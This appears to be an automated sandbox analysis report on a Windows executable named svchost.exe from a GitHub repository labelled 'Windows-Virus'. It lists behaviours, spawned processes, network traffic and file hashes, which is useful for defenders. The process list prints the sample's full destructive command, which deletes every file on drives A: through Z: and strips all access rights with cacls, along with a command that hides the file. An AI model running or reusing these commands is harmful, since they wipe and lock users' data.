Analysis Overview
Threat Level: Likely malicious
The file https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Detects Pyinstaller
Views/modifies file attributes
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
NTFS ADS
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-10 14:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 14:40
Reported
2024-05-10 14:43
Platform
win10v2004-20240426-en
Max time kernel
173s
Max time network
162s
Command Line
Signatures
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\cacls.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\bootim.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Globalization\ICU\icudtl.dat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\system32\bootim.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\bootim.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\bootim.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\bootim.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "237" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 207892.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\bootim.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\bootim.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mmc.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6d1046f8,0x7ffd6d104708,0x7ffd6d104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5468 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6060 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Users\Admin\Downloads\svchost.exe
"C:\Users\Admin\Downloads\svchost.exe"
C:\Users\Admin\Downloads\svchost.exe
"C:\Users\Admin\Downloads\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s svchost.exe
C:\Windows\system32\attrib.exe
attrib +h +s svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c timeout 1 & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & del A:\*.* /f /s /q & cacls A:\ /e /p everyone:n & del B:\*.* /f /s /q & cacls B:\ /e /p everyone:n & del D:\*.* /f /s /q & cacls D:\ /e /p everyone:n & del E:\*.* /f /s /q & cacls E:\ /e /p everyone:n & del F:\*.* /f /s /q & cacls F:\ /e /p everyone:n & del G:\*.* /f /s /q & cacls G:\ /e /p everyone:n & del H:\*.* /f /s /q & cacls H:\ /e /p everyone:n & del I:\*.* /f /s /q & cacls I:\ /e /p everyone:n & del J:\*.* /f /s /q & cacls J:\ /e /p everyone:n & del K:\*.* /f /s /q & cacls K:\ /e /p everyone:n & del L:\*.* /f /s /q & cacls L:\ /e /p everyone:n & del M:\*.* /f /s /q & cacls M:\ /e /p everyone:n & del N:\*.* /f /s /q & cacls N:\ /e /p everyone:n & del O:\*.* /f /s /q & cacls O:\ /e /p everyone:n & del P:\*.* /f /s /q & cacls P:\ /e /p everyone:n & del Q:\*.* /f /s /q & cacls Q:\ /e /p everyone:n & del R:\*.* /f /s /q & cacls R:\ /e /p everyone:n & del S:\*.* /f /s /q & cacls S:\ /e /p everyone:n & del T:\*.* /f /s /q & cacls T:\ /e /p everyone:n & del U:\*.* /f /s /q & cacls U:\ /e /p everyone:n & del V:\*.* /f /s /q & cacls V:\ /e /p everyone:n & del W:\*.* /f /s /q & cacls W:\ /e /p everyone:n & del X:\*.* /f /s /q & cacls X:\ /e /p everyone:n & del Y:\*.* /f /s /q & cacls Y:\ /e /p everyone:n & del Z:\*.* /f /s /q & cacls Z:\ /e /p everyone:n & del C:\*.* /f /s /q & cacls C:\ /e /p everyone:n
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cacls.exe
cacls A:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls B:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls D:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls E:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls F:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls G:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls H:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls I:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls J:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls K:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls L:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls M:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls N:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls O:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls P:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Q:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls R:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls S:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls T:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls U:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls V:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls W:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls X:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Y:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls Z:\ /e /p everyone:n
C:\Windows\system32\cacls.exe
cacls C:\ /e /p everyone:n
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault9eb942a4h4d64h4970h8903h042002736874
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd6d1046f8,0x7ffd6d104708,0x7ffd6d104718
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" C:\Windows\system32\devmgmt.msc
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38cf855 /state1:0x41c64e6d
C:\Windows\system32\bootim.exe
bootim.exe /startpage:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.217:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 217.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| BE | 88.221.83.217:443 | www.bing.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.53.16.96.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.201.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ea98e583ad99df195d29aa066204ab56 |
| SHA1 | f89398664af0179641aa0138b337097b617cb2db |
| SHA256 | a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6 |
| SHA512 | e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f |
\??\pipe\LOCAL\crashpad_4044_BKDORYCLJEYWVFHP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4f7152bc5a1a715ef481e37d1c791959 |
| SHA1 | c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7 |
| SHA256 | 704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc |
| SHA512 | 2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ce386fa0a7a99620d2c111a51f2ab86e |
| SHA1 | cc3436b75102314bc13ec3269b348ae7b5af34c5 |
| SHA256 | c1303601b4037470644dadeff70d658ea621fbf921fc6f088e7d6fb426a5db69 |
| SHA512 | 613b1af9526c49b932362ded94a1dbb3ac447e0d8751051225ff3c44635a161168452e0ad356259e793cdb3e5111f20201f2270b4cf899f951acacf6baeab0e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
